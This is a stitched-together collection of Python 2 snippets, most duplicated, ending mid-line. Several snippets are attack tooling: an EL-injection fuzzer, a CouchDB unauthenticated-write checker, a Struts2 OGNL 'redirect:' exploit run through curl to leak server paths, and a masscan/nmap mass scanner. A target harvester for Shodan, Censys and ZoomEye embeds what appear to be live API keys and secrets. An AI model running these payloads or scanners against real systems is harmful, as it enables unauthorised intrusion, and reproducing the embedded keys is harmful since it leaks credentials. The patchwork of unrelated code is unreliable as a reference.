class ELExpression(): def __init__(self): self.result = [] self.pool = ThreadPool(10) self.q = [] self.payload = '{1000-121}' self.match = '879' def putinqueue(self, info): try: url = info[0] data = info[1] current = data if data else url for k in re.finditer(r'\=(?P<value>.*?)(?:$|&)', current): value = k.group('value') payload = current.replace(value, self.payload) if data: self.q.append((url, payload)) else: self.q.append((payload, data)) except: traceback.print_exc() def Fuzz(self, info): try: url = info[0] data = info[1] if data: try: r = requests.post(url, data=data, timeout=10, verify=False) content = r.content except: content = '' else: try: print "Req ::" + url r = requests.get(url, timeout=10, verify=False) content = r.content except: content = '' if self.match in content: msg = 'find vulnerable url' logging.info(msg) self.result.append(info) except: traceback.print_exc() def Scan(self, info): try: if isinstance(info, tuple): self.putinqueue(info) else: with open(info) as f: ud = json.loads(f.read()) for i in ud: self.putinqueue(i) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
class ELExpression(): def __init__(self): self.result = [] self.pool = ThreadPool(10) self.q = [] self.payload = '${1000-121}' self.match = '879' def putinqueue(self, info): try: url = info[0] data = info[1] current = data if data else url for k in re.finditer(r'\=(?P<value>.*?)(?:$|&)', current): value = k.group('value') payload = current.replace(value, self.payload) if data: self.q.append((url, payload)) else: self.q.append((payload, data)) except: traceback.print_exc() def Fuzz(self, info): try: url = info[0] data = info[1] if data: try: r = requests.post(url, data=data, timeout=10, verify=False) content = r.content except: content = '' else: try: print "Req ::" + url r = requests.get(url, timeout=10, verify=False) content = r.content except: content = '' if self.match in content: msg = 'find vulnerable url' logging.info(msg) self.result.append(info) except: traceback.print_exc() def Scan(self, info): try: if isinstance(info, tuple): self.putinqueue(info) else: with open(info) as f: ud = json.loads(f.read()) for i in ud: self.putinqueue(i) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
def easy_parallelize_gevent(f, sequence): if not "gevent_pool" in PARALLEL_STRUCTURES: from gevent.threadpool import ThreadPool pool = ThreadPool(30000) PARALLEL_STRUCTURES["gevent_pool"] = pool pool = PARALLEL_STRUCTURES["gevent_pool"] result = pool.map(f, sequence) return result
def easy_parallelize_gevent(f, sequence): if not "gevent_pool" in PARALLEL_STRUCTURES: from gevent.threadpool import ThreadPool pool = ThreadPool(30000) PARALLEL_STRUCTURES["gevent_pool"] = pool pool = PARALLEL_STRUCTURES["gevent_pool"] result = pool.map(f, sequence) return result
class CouchDb(): def __init__(self): self.pool = ThreadPool(10) self.result = [] self.port = "5984" self.q = [] self.randomstrs = ['a', 'k', 'b', 'v', 'd', 'f', 'e', 'g'] self.path = '_utils/index.html' def Fuzz(self, info): try: url = info[0] port = info[1] host = urlparse.urlparse(url).netloc url = r'http://' + host + ":" + port rstr = "".join(random.sample(self.randomstrs, 5)) url = url + r'/' + rstr try: print "Req::" + url r = requests.put(url, timeout=10) if 'ok' and 'true' in r.content: self.result.append(info) except: pass except: pass def Scan(self, info): try: if isinstance(info, tuple): self.q.append(info) else: with open(file) as f: content = json.loads(f.read()) for i in content: self.q.append((i['url'], self.port)) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
class CouchDb(): def __init__(self): self.pool = ThreadPool(10) self.result = [] self.port = "5984" self.q = [] self.randomstrs = ['a', 'k', 'b', 'v', 'd', 'f', 'e', 'g'] self.path = '_utils/index.html' def Fuzz(self, info): try: url = info[0] port = info[1] host = urlparse.urlparse(url).netloc url = r'http://' + host + ":" + port rstr = "".join(random.sample(self.randomstrs, 5)) url = url + r'/' + rstr try: print "Req::" + url r = requests.put(url, timeout=10) if 'ok' and 'true' in r.content: self.result.append(info) except: pass except: pass def Scan(self, info): try: if isinstance(info, tuple): self.q.append(info) else: with open(file) as f: content = json.loads(f.read()) for i in content: self.q.append((i['url'], self.port)) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
class st2bypass(): def __init__(self): self.result = [] self.pool = ThreadPool(10) self.q = [] def action(self, info): try: if '.do' or '.action' in info: url = info.split('?')[0] self.q.append(url) except: traceback.print_exc() def Fuzz(self, url): try: cmd = '''curl -i "%s" -F 'redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}=-1' ''' % url print cmd output = os.popen(cmd).read() for i in re.finditer(r'\:\/\/.*\/\/(?P<path>' r'.*?)/;', output): path = i.group('path') if path: self.result.append(path) except: traceback.print_exc() def Scan(self, info): try: if isinstance(info, str): self.action(info) else: for i in info: self.action(i['url']) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
class st2bypass(): def __init__(self): self.result = [] self.pool = ThreadPool(10) self.q = [] def action(self, info): try: if '.do' or '.action' in info: url = info.split('?')[0] self.q.append(url) except: traceback.print_exc() def Fuzz(self, url): try: cmd = '''curl -i "%s" -F 'redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}=-1' ''' % url print cmd output = os.popen(cmd).read() for i in re.finditer(r'\:\/\/.*\/\/(?P<path>' r'.*?)/;', output): path = i.group('path') if path: self.result.append(path) except: traceback.print_exc() def Scan(self, info): try: if isinstance(info, str): self.action(info) else: for i in info: self.action(i['url']) self.pool.map(self.Fuzz, self.q) except: traceback.print_exc()
class Scanner(object): def __init__(self, filename='ips.txt'): self.W = '\033[0m' self.G = '\033[1;32m' self.O = '\033[1;33m' self.R = '\033[1;31m' self.time = time() self.result = [] self.ips = filename self.pool = ThreadPool(30) self.output_mode = "silent" # debug or silent self.masscan_ports_max = 500 self.masscan_ports = '0-65535' self.masscan_rate = 1000 self.default_policy = '-P0 -sS -sV -O -Pn --open --script=banner --script-timeout=7200 -script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36"' self.nmap_timeout = 3600 self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", } self.patterns = ( '<meta[\s]*http-equiv[\s]*=[\s]*[\'"]refresh[\'"][\s]*content[\s]*=[\s]*[\'"]\d+[\s]*;[\s]*url[\s]*=[\s]*(.*?)[\'"][\s]*/?>', 'window.location[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;', 'window.location.href[\s]*=[\s]*[\'"](.*?)[\'"][\s]*;', 'window.location.replace[\s]*\([\'"](.*?)[\'"]\)[\s]*;', 'window.navigate[\s]*\([\'"](.*?)[\'"]\)', 'location.href[\s]*=[\s]*[\'"](.*?)[\'"]', ) self.default_top1000 = [ 1, 3, 4, 6, 7, 9, 11, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30, 32, 33, 37, 42, 43, 49, 53, 67, 69, 70, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 99, 100, 102, 104, 106, 109, 110, 111, 113, 119, 123, 125, 135, 137, 138, 139, 143, 144, 146, 161, 162, 163, 175, 179, 199, 211, 212, 222, 254, 255, 256, 259, 264, 280, 301, 306, 311, 340, 366, 389, 391, 406, 407, 416, 417, 425, 427, 443, 444, 445, 459, 464, 465, 481, 497, 500, 502, 503, 512, 513, 514, 515, 520, 523, 524, 541, 543, 544, 545, 548, 554, 555, 563, 564, 587, 593, 616, 617, 623, 625, 626, 631, 636, 646, 648, 666, 667, 668, 683, 687, 691, 700, 705, 711, 714, 720, 722, 726, 749, 765, 771, 777, 783, 787, 789, 800, 801, 808, 843, 873, 880, 888, 898, 900, 901, 902, 903, 911, 912, 981, 987, 990, 992, 993, 995, 999, 1000, 1001, 1002, 1007, 1009, 1010, 1011, 1021, 1022, 1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1102, 1104, 1105, 1106, 1107, 1108, 1110, 1111, 1112, 1113, 1114, 1117, 1119, 1121, 1122, 1123, 1124, 1126, 1130, 1131, 1132, 1137, 1138, 1141, 1145, 1147, 1148, 1149, 1151, 1152, 1154, 1163, 1164, 1165, 1166, 1169, 1174, 1175, 1177, 1183, 1185, 1186, 1187, 1192, 1194, 1198, 1199, 1200, 1201, 1213, 1216, 1217, 1218, 1233, 1234, 1236, 1241, 1244, 1247, 1248, 1259, 1260, 1271, 1272, 1277, 1287, 1296, 1300, 1301, 1309, 1310, 1311, 1322, 1328, 1334, 1344, 1352, 1417, 1433, 1434, 1443, 1455, 1461, 1471, 1494, 1500, 1501, 1503, 1521, 1524, 1533, 1556, 1580, 1583, 1594, 1600, 1604, 1641, 1645, 1658, 1666, 1687, 1688, 1700, 1701, 1717, 1718, 1719, 1720, 1721, 1723, 1755, 1761, 1782, 1783, 1801, 1805, 1812, 1839, 1840, 1862, 1863, 1864, 1875, 1883, 1900, 1911, 1914, 1935, 1947, 1962, 1967, 1971, 1972, 1974, 1984, 1991, 1993, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2013, 2020, 2021, 2022, 2030, 2033, 2034, 2035, 2038, 2040, 2041, 2042, 2043, 2045, 2046, 2047, 2048, 2049, 2065, 2068, 2080, 2082, 2083, 2086, 2087, 2094, 2099, 2100, 2103, 2105, 2106, 2107, 2111, 2119, 2121, 2123, 2126, 2135, 2144, 2152, 2160, 2161, 2170, 2179, 2181, 2190, 2191, 2196, 2200, 2222, 2251, 2260, 2288, 2301, 2323, 2332, 2366, 2375, 2376, 2379, 2381, 2382, 2383, 2393, 2394, 2399, 2401, 2404, 2424, 2425, 2427, 2455, 2480, 2492, 2500, 2501, 2522, 2525, 2557, 2601, 2602, 2604, 2605, 2607, 2608, 2628, 2638, 2701, 2702, 2710, 2717, 2718, 2725, 2800, 2809, 2811, 2869, 2875, 2909, 2910, 2920, 2967, 2968, 2998, 3000, 3001, 3003, 3005, 3006, 3007, 3011, 3013, 3017, 3030, 3031, 3050, 3052, 3071, 3077, 3128, 3168, 3211, 3221, 3260, 3261, 3268, 3269, 3283, 3288, 3299, 3300, 3301, 3306, 3307, 3310, 3322, 3323, 3324, 3325, 3333, 3351, 3367, 3369, 3370, 3371, 3372, 3388, 3389, 3390, 3404, 3460, 3476, 3493, 3517, 3527, 3541, 3542, 3546, 3551, 3580, 3659, 3671, 3689, 3690, 3702, 3703, 3737, 3749, 3766, 3780, 3784, 3800, 3801, 3809, 3814, 3826, 3827, 3828, 3851, 3869, 3871, 3878, 3880, 3889, 3905, 3914, 3918, 3920, 3945, 3971, 3986, 3995, 3998, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4022, 4040, 4045, 4063, 4064, 4070, 4111, 4125, 4126, 4129, 4224, 4242, 4279, 4321, 4343, 4369, 4433, 4443, 4444, 4445, 4446, 4449, 4550, 4567, 4662, 4712, 4730, 4786, 4800, 4840, 4848, 4880, 4899, 4900, 4911, 4949, 4998, 5000, 5001, 5002, 5003, 5004, 5006, 5007, 5009, 5030, 5033, 5050, 5051, 5054, 5060, 5061, 5080, 5087, 5093, 5094, 5100, 5101, 5102, 5120, 5190, 5200, 5214, 5221, 5222, 5225, 5226, 5269, 5280, 5298, 5351, 5353, 5357, 5400, 5405, 5414, 5431, 5432, 5433, 5440, 5500, 5510, 5544, 5550, 5554, 5555, 5560, 5566, 5577, 5601, 5631, 5632, 5633, 5666, 5672, 5678, 5679, 5683, 5718, 5730, 5800, 5801, 5802, 5810, 5811, 5815, 5822, 5825, 5850, 5859, 5862, 5877, 5900, 5901, 5902, 5903, 5904, 5906, 5907, 5910, 5911, 5915, 5922, 5925, 5938, 5950, 5952, 5959, 5960, 5961, 5962, 5963, 5984, 5985, 5986, 5987, 5988, 5989, 5998, 5999, 6000, 6001, 6002, 6003, 6004, 6005, 6007, 6009, 6025, 6059, 6082, 6100, 6101, 6106, 6112, 6123, 6129, 6156, 6346, 6379, 6389, 6488, 6502, 6510, 6543, 6547, 6565, 6566, 6567, 6580, 6646, 6664, 6665, 6666, 6667, 6668, 6669, 6689, 6692, 6699, 6779, 6788, 6789, 6792, 6839, 6881, 6901, 6969, 7000, 7001, 7002, 7004, 7007, 7019, 7025, 7070, 7071, 7077, 7100, 7103, 7106, 7200, 7201, 7288, 7402, 7435, 7443, 7474, 7496, 7512, 7547, 7548, 7625, 7627, 7634, 7676, 7741, 7777, 7778, 7779, 7800, 7911, 7920, 7921, 7937, 7938, 7999, 8000, 8001, 8002, 8007, 8008, 8009, 8010, 8011, 8021, 8022, 8023, 8031, 8042, 8045, 8060, 8069, 8080, 8081, 8082, 8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8093, 8098, 8099, 8100, 8112, 8125, 8126, 8139, 8161, 8180, 8181, 8192, 8193, 8194, 8200, 8222, 8254, 8290, 8291, 8292, 8300, 8333, 8334, 8377, 8378, 8383, 8400, 8402, 8443, 8471, 8500, 8545, 8554, 8600, 8649, 8651, 8652, 8654, 8686, 8701, 8800, 8834, 8873, 8880, 8883, 8888, 8889, 8899, 8994, 9000, 9001, 9002, 9003, 9009, 9010, 9011, 9040, 9042, 9050, 9051, 9071, 9080, 9081, 9090, 9091, 9099, 9100, 9101, 9102, 9103, 9110, 9111, 9151, 9160, 9191, 9200, 9207, 9220, 9290, 9300, 9333, 9415, 9418, 9443, 9471, 9485, 9500, 9502, 9503, 9535, 9575, 9593, 9594, 9595, 9600, 9618, 9653, 9666, 9700, 9711, 9876, 9877, 9878, 9898, 9900, 9917, 9929, 9943, 9944, 9968, 9981, 9998, 9999, 10000, 10001, 10002, 10003, 10004, 10009, 10010, 10012, 10024, 10025, 10082, 10162, 10180, 10215, 10243, 10333, 10566, 10616, 10617, 10621, 10626, 10628, 10629, 10778, 11001, 11110, 11111, 11211, 11300, 11310, 11967, 12000, 12174, 12265, 12345, 13456, 13579, 13722, 13782, 13783, 14000, 14147, 14238, 14265, 14441, 14442, 15000, 15002, 15003, 15004, 15660, 15672, 15742, 16000, 16001, 16010, 16012, 16016, 16018, 16080, 16113, 16992, 16993, 17185, 17877, 17988, 18001, 18040, 18081, 18101, 18245, 18988, 19101, 19283, 19315, 19350, 19780, 19801, 19842, 19888, 20000, 20005, 20031, 20221, 20222, 20547, 20828, 21571, 22105, 22222, 22939, 23023, 23424, 23502, 24444, 24800, 25105, 25565, 25734, 25735, 26214, 27000, 27015, 27017, 27019, 27080, 27352, 27353, 27355, 27356, 27715, 28017, 28201, 28784, 30000, 30310, 30311, 30312, 30313, 30718, 30951, 31038, 31337, 32400, 32768, 32769, 32770, 32771, 32772, 32773, 32774, 32775, 32776, 32777, 32778, 32779, 32780, 32781, 32782, 32783, 32784, 32785, 33338, 33354, 33899, 34571, 34572, 34573, 34962, 34964, 35500, 37777, 38292, 40193, 40911, 41511, 42510, 44176, 44442, 44443, 44501, 44818, 45100, 45554, 47808, 48080, 48899, 49151, 49152, 49153, 49154, 49155, 49156, 49157, 49158, 49159, 49160, 49161, 49163, 49165, 49167, 49175, 49176, 49400, 49999, 50000, 50001, 50002, 50003, 50006, 50050, 50070, 50090, 50100, 50300, 50389, 50500, 50636, 50800, 51103, 51106, 51493, 52673, 52822, 52848, 52869, 54045, 54328, 55055, 55056, 55553, 55555, 55600, 56737, 56738, 57294, 57797, 58080, 59110, 60020, 60443, 61532, 61613, 61616, 61900, 62078, 63331, 64623, 64680, 64738, 65000, 65129, 65389 ] def targetsByFile(self): targets = [] try: with open(self.ips) as fr: for ip in fr.readlines(): targets.append(ip.strip()) except Exception as e: print self.R + u'\n[x] file does not exist...' + self.W return targets def scanByMasscan(self, target): report_dict = defaultdict(list) tmp_file = '{}.xml'.format(uuid.uuid4()) try: cmd = 'masscan {} -p {} -oX {} --rate {} --wait 1 >> /dev/null 2>&1'.format(target, self.masscan_ports, tmp_file, self.masscan_rate) \ if self.output_mode == "silent" else 'masscan {} -p {} -oX {} --rate {} --wait 1'.format( target, self.masscan_ports, tmp_file, self.masscan_rate) os.system(cmd) if os.path.exists(tmp_file) and os.path.getsize(tmp_file): report = NmapParser.parse_fromfile(tmp_file) for host in report.hosts: for service in host.services: report_dict[host.ipv4].append(service.port) except Exception as e: print e finally: if os.path.exists(tmp_file): os.remove(tmp_file) return report_dict def scanByNmap(self, target, policy): runtime = 0 try: nmap_proc = NmapProcess(targets=target, options=policy, safe_mode=True) nmap_proc.run_background() while nmap_proc.is_running(): if runtime >= self.nmap_timeout: nmap_proc.stop() if self.output_mode != "silent": print self.R + u'\n[x] scan_host {} timeout...'.format( target) + self.W break else: if self.output_mode != "silent": sys.stdout.write( u'\033[1;34m[~] scan_host is {},scan progress is {}%({} sec)\n\033[0m' .format(target, nmap_proc.progress, runtime)) sys.stdout.flush() sleep(5) runtime += 5 if nmap_proc.is_successful() and nmap_proc.stdout: self.parserReport(nmap_proc.stdout) except Exception as e: print e def parserTitle(self, url): def html_decoder(html_entries): try: hp = HTMLParser.HTMLParser() return hp.unescape(html_entries) except: return html_entries def match_title(content): title = re.findall("document\.title[\s]*=[\s]*['\"](.*?)['\"]", content, re.I | re.M | re.S) if title and len(title) >= 1: return title[0] else: title = re.findall('<title.*?>(.*?)</title>', content, re.I | re.M | re.S) if title and len(title) >= 1: return title[0] else: return "" def page_decode(html_content): raw_content = html_content try: html_content = raw_content.decode('utf-8') except UnicodeError: try: html_content = raw_content.decode('gbk') except UnicodeError: try: html_content = raw_content.decode('gb2312') except UnicodeError: try: html_content = raw_content.decode('big5') except: pass return html_content html_content = '' title = '' if '://' not in url: url = 'http://' + url.strip() url = url.rstrip('/') + '/' try: try: s = requests.Session() s.mount('http://', HTTPAdapter(max_retries=1)) s.mount('https://', HTTPAdapter(max_retries=1)) req = s.get(url, headers=self.headers, verify=False, allow_redirects=True, timeout=15) html_content = req.content html_content = page_decode(html_content) req.close() except: pass title = match_title(html_content) if html_content else '' try: if title: if re.findall('\$#\d{3,};', title): title = html_decoder(title) except: pass for pattern in self.patterns: jump = re.findall(pattern, html_content, re.I | re.M) if len(jump) == 1: if "://" in jump[0]: url = jump[0] else: url += jump[0] break try: s = requests.Session() s.mount('http://', HTTPAdapter(max_retries=1)) s.mount('https://', HTTPAdapter(max_retries=1)) req = s.get(url, headers=self.headers, verify=False, timeout=15) html_content = req.content req.close() except: pass html_content = page_decode(html_content) title = match_title(html_content) if html_content else "" try: if title: if re.findall("[$#]\d{3,};", title): title = html_decoder(title) except: pass except: pass finally: if title and len(title) > 255: title = title[:250] return title def parserReport(self, report): try: parsed = NmapParser.parse(report) for host in parsed.hosts: for services in host.services: if ("http" in services.service) or ("ssl" in services.service): url = "https://" + host.ipv4 + ":" + str( services.port) if ('ssl' in services.service) or ( 'https' in services.service ) else "http://" + host.ipv4 + ":" + str( services.port) title = self.parserTitle(url) self.result.append( (host.ipv4, services.port, services.protocol, services.state, services.service, services.banner, title)) print u'{}[+] scan_host is {},scan result is {}|{}|{}|{}|{}|{}{}'.format( self.G, host.ipv4, services.port, services.protocol, services.state, services.service, services.banner, title, self.W) except Exception as e: print e def scanMasscanToNmap(self, target): try: ip_port_list = self.scanByMasscan(target) if ip_port_list: for target, ports in ip_port_list.items(): if len(ports) < self.masscan_ports_max: policy = self.default_policy + " -p {}".format( ','.join( map(str, list( set(self.default_top1000 + ports))))) self.scanByNmap(str(target), policy) else: if self.output_mode != "silent": print self.R + u'\n[x] scan_host {} maybe honeypot or network reasons...'.format( target) + self.W else: if self.output_mode != "silent": print self.R + u'\n[x] scan_host {} not found live ports...'.format( target) + self.W except Exception as e: print e def main(self): try: print '\033[1;37m[*] Console starting({} mode), please wait...\033[0m'.format( self.output_mode) self.pool.map(self.scanMasscanToNmap, self.targetsByFile()) self.pool.join() if self.result: csvfile = file('result.csv', 'wb') csvfile.write(u'\ufeff'.encode('utf8')) writer = csv.writer(csvfile) writer.writerow([ 'Address', 'Port', 'Protocol', 'State', 'Service', 'Banner', 'Title' ]) writer.writerows(self.result) csvfile.close() print u'{}[✓] scan completion time : {} sec.{}'.format( self.O, time() - self.time, self.W) except Exception as e: print e except KeyboardInterrupt: print self.R + u'\n[x] user Ctrl+C aborts scan ...' + self.W sys.exit(1)
def download(url, output, thread_count=defaults['thread_count'], buffer_size=defaults['buffer_size'], block_size=defaults['block_size']): # get latest file info file_info = get_file_info(url) # init path if output is None: output = file_info.name workpath = '%s.ing' % output infopath = '%s.inf' % output # split file to blocks. every block is a array [start, offset, end], # then each greenlet download filepart according to a block, and # update the block' offset. blocks = [] if os.path.exists(infopath): # load blocks _x, blocks = read_data(infopath) if (_x.url != url or _x.name != file_info.name or _x.lastmodified != file_info.lastmodified): blocks = [] if len(blocks) == 0: # set blocks if block_size > file_info.size: blocks = [[0, 0, file_info.size]] else: block_count, remain = divmod(file_info.size, block_size) blocks = [[ i * block_size, i * block_size, (i + 1) * block_size - 1 ] for i in range(block_count)] blocks[-1][-1] += remain # create new blank workpath with open(workpath, 'wb') as fobj: fobj.write('') # start monitor monitor = gevent.spawn(_monitor, infopath, file_info, blocks) # start downloading with open(workpath, 'rb+') as fobj: args = [(url, blocks[i], fobj, buffer_size) for i in range(len(blocks)) if blocks[i][1] < blocks[i][2]] if thread_count > len(args): thread_count = len(args) pool = ThreadPool(thread_count) pool.map(_worker, args) pool.join() monitor.join() # rename workpath to output if os.path.exists(output): os.remove(output) os.rename(workpath, output) # delete infopath if os.path.exists(infopath): os.remove(infopath) print 'thread_count ', thread_count
class Cloud: def __init__(self): self.pool = ThreadPool(POOL_THREADS) self.bugs = [] self.have_content = True pass def get_one_page(self, page_id): print('[*] Crawl Page: {0}'.format(str(page_id))) page_url = WOOYUN_CONFIRM + str(page_id) while True: try: req = requests.get(page_url, headers=HEADER, timeout=15) if req.status_code == 200: break except Exception as e: print('[-] Page: {0} Get Error: {1}'.format( str(page_id), str(e))) self.analyse_content(req.text) def analyse_content(self, content): try: reg_pattern = '<tr>\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s' tmp = re.findall(reg_pattern, content) if len(tmp) <= 1: self.have_content = False return for tmp_one in tmp: # print(tmp_one) bug_info = {} reg_pattern = '<th>(.*?)</th>' bug_date = re.findall(reg_pattern, tmp_one[1]) if len(bug_date) > 0: bug_info['date'] = bug_date[0] reg_pattern = '<a href="/bugs/(.*?)">(.*?)</a>' bug_info_tmp = re.findall(reg_pattern, tmp_one[2]) bug_info_tmp = bug_info_tmp[0] bug_info['id'] = bug_info_tmp[0] bug_info['name'] = bug_info_tmp[1] self.get_bug_detail(bug_info_tmp[0], bug_info) self.bugs.append(bug_info) except Exception as e: print('[-] Analyse Error! Detail: {0}'.format(str(e))) @staticmethod def get_bug_detail(bug_id, bug_info): page_url = WOOYUN_BUG_DETAIL + str(bug_id) while True: try: req = requests.get(page_url, headers=HEADER, timeout=15) if req.status_code == 200: break except Exception as e: print('[-] BUG: {0} Get Error: {1}'.format( str(bug_id), str(e))) content = req.text reg_pattern = '<p class="detail">漏洞Rank:(.*?)</p>' bug_info_tmp = re.findall(reg_pattern, content) bug_info['rank'] = bug_info_tmp[0].strip() reg_pattern = '<h3 class=\'wybug_corp\'>相关厂商:(.*)\s(.*?)</a>' bug_info_tmp = re.findall(reg_pattern, content) bug_info['corp'] = bug_info_tmp[0][0].strip( ) + bug_info_tmp[0][1].strip() def start(self): i_count = 1 while self.have_content: self.pool.map(self.get_one_page, [x for x in range(i_count, i_count + 50)]) gevent.wait() i_count += 50 print(self.bugs) file_handle = open('wy_no_1.csv', 'w') file_handle.write('bug_id, rank, name, corp, date\n') for one_bug in self.bugs: file_handle.write('{0}, {1}, {2}, {3}, {4}\n'.format( one_bug['id'], one_bug['rank'], one_bug['name'], one_bug['corp'], one_bug['date'])) print(one_bug) file_handle.close()
def download(url, output, thread_count = defaults['thread_count'], buffer_size = defaults['buffer_size'], block_size = defaults['block_size']): # get latest file info file_info = get_file_info(url) # init path if output is None: output = file_info.name workpath = '%s.ing' % output infopath = '%s.inf' % output # split file to blocks. every block is a array [start, offset, end], # then each greenlet download filepart according to a block, and # update the block' offset. blocks = [] if os.path.exists(infopath): # load blocks _x, blocks = read_data(infopath) if (_x.url != url or _x.name != file_info.name or _x.lastmodified != file_info.lastmodified): blocks = [] if len(blocks) == 0: # set blocks if block_size > file_info.size: blocks = [[0, 0, file_info.size]] else: block_count, remain = divmod(file_info.size, block_size) blocks = [[i*block_size, i*block_size, (i+1)*block_size-1] for i in range(block_count)] blocks[-1][-1] += remain # create new blank workpath with open(workpath, 'wb') as fobj: fobj.write('') # start monitor monitor = gevent.spawn(_monitor, infopath, file_info, blocks) # start downloading with open(workpath, 'rb+') as fobj: args = [(url, blocks[i], fobj, buffer_size) for i in range(len(blocks)) if blocks[i][1] < blocks[i][2]] if thread_count > len(args): thread_count = len(args) pool = ThreadPool(thread_count) pool.map(_worker, args) pool.join() monitor.join() # rename workpath to output if os.path.exists(output): os.remove(output) os.rename(workpath, output) # delete infopath if os.path.exists(infopath): os.remove(infopath) print 'thread_count ', thread_count
class Cloud: def __init__(self): self.pool = ThreadPool(POOL_THREADS) self.bugs = [] self.have_content = True pass def get_one_page(self, page_id): print('[*] Crawl Page: {0}'.format(str(page_id))) page_url = WOOYUN_CONFIRM + str(page_id) while True: try: req = requests.get(page_url, headers=HEADER, timeout=15) if req.status_code == 200: break except Exception as e: print('[-] Page: {0} Get Error: {1}'.format(str(page_id), str(e))) self.analyse_content(req.text) def analyse_content(self, content): try: reg_pattern = '<tr>\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s(.*)\s' tmp = re.findall(reg_pattern, content) if len(tmp) <= 1: self.have_content = False return for tmp_one in tmp: # print(tmp_one) bug_info = {} reg_pattern = '<th>(.*?)</th>' bug_date = re.findall(reg_pattern, tmp_one[1]) if len(bug_date) > 0: bug_info['date'] = bug_date[0] reg_pattern = '<a href="/bugs/(.*?)">(.*?)</a>' bug_info_tmp = re.findall(reg_pattern, tmp_one[2]) bug_info_tmp = bug_info_tmp[0] bug_info['id'] = bug_info_tmp[0] bug_info['name'] = bug_info_tmp[1] self.get_bug_detail(bug_info_tmp[0], bug_info) self.bugs.append(bug_info) except Exception as e: print('[-] Analyse Error! Detail: {0}'.format(str(e))) @staticmethod def get_bug_detail(bug_id, bug_info): page_url = WOOYUN_BUG_DETAIL + str(bug_id) while True: try: req = requests.get(page_url, headers=HEADER, timeout=15) if req.status_code == 200: break except Exception as e: print('[-] BUG: {0} Get Error: {1}'.format(str(bug_id), str(e))) content = req.text reg_pattern = '<p class="detail">漏洞Rank:(.*?)</p>' bug_info_tmp = re.findall(reg_pattern, content) bug_info['rank'] = bug_info_tmp[0].strip() reg_pattern = '<h3 class=\'wybug_corp\'>相关厂商:(.*)\s(.*?)</a>' bug_info_tmp = re.findall(reg_pattern, content) bug_info['corp'] = bug_info_tmp[0][0].strip() + bug_info_tmp[0][1].strip() def start(self): i_count = 1 while self.have_content: self.pool.map(self.get_one_page, [x for x in range(i_count, i_count + 50)]) gevent.wait() i_count += 50 print(self.bugs) file_handle = open('wy_no_1.csv', 'w') file_handle.write('bug_id, rank, name, corp, date\n') for one_bug in self.bugs: file_handle.write('{0}, {1}, {2}, {3}, {4}\n'. format(one_bug['id'], one_bug['rank'], one_bug['name'], one_bug['corp'], one_bug['date'])) print(one_bug) file_handle.close()
class TargetCollect(object): def __init__(self, info): self.pool = ThreadPool(30) self.page = 80 self.headers = { 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'User-Agent': "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate, sdch, br', 'Accept-Language': 'zh-CN,zh;q=0.8', } self.urls_result = set() self.ips_result = set() self.ips_filename = "IP.txt" self.urls_filename = "URL.txt" self.proxy = { 'http': 'http://127.0.0.1:1080', 'https': 'http://127.0.0.1:1080' } self.shodan_url = "https://api.shodan.io/shodan/host/search?query=apache&key=MM72AkzHXdHpC8iP65VVEEVrJjp7zkgd" self.shodan_token = "XHSWncMjN6MEyekECTMcOeoEocl6VO2q" self.shodan_keyword = info['shodan'] self.censys_url = "https://censys.io/api/v1/search/ipv4" self.censys_api_id = "9b611dbd-366b-41b1-a50e-1a024004609f" self.censys_secret = "wAUW4Ax9uyCkD7JrgS1ItJE5nHQD5DnR" self.censys_keyword = info['censys'] self.fofa_email = "*****@*****.**" self.fofa_token = "xxxx" self.fofa_keyword = info['fofa'] self.zoomeye_url = "https://api.zoomeye.org/host/search?page={}&query={}" self.zoomeye_user = "******" self.zoomeye_pass = "******" self.zoomeye_keyword = info['zoomeye'] self.zoomeye_pool = ThreadPool(10) self.baidu_url = "http://www.baidu.com/s?wd={}&pn={}0" self._360_url = "https://www.so.com/s?q={}&pn={}&fr=so.com" self.google_url = "https://www.google.com/search?q={}&safe=strict&start={}" self.keyword = info['b3g'] def Shodan(self): try: api = shodan.Shodan(self.shodan_token) services = api.search(self.shodan_keyword) for service in services['matches']: print "[\033[0;39;40mShodan\033[0m] {}".format( service["ip_str"] + ":" + str(service["port"])) self.ips_result.add(service["ip_str"] + ":" + str(service["port"])) except: print "[\033[0;35;40mShodan\033[0m] Error" pass def Censys(self): try: r = requests.post(self.censys_url, auth=(self.censys_api_id, 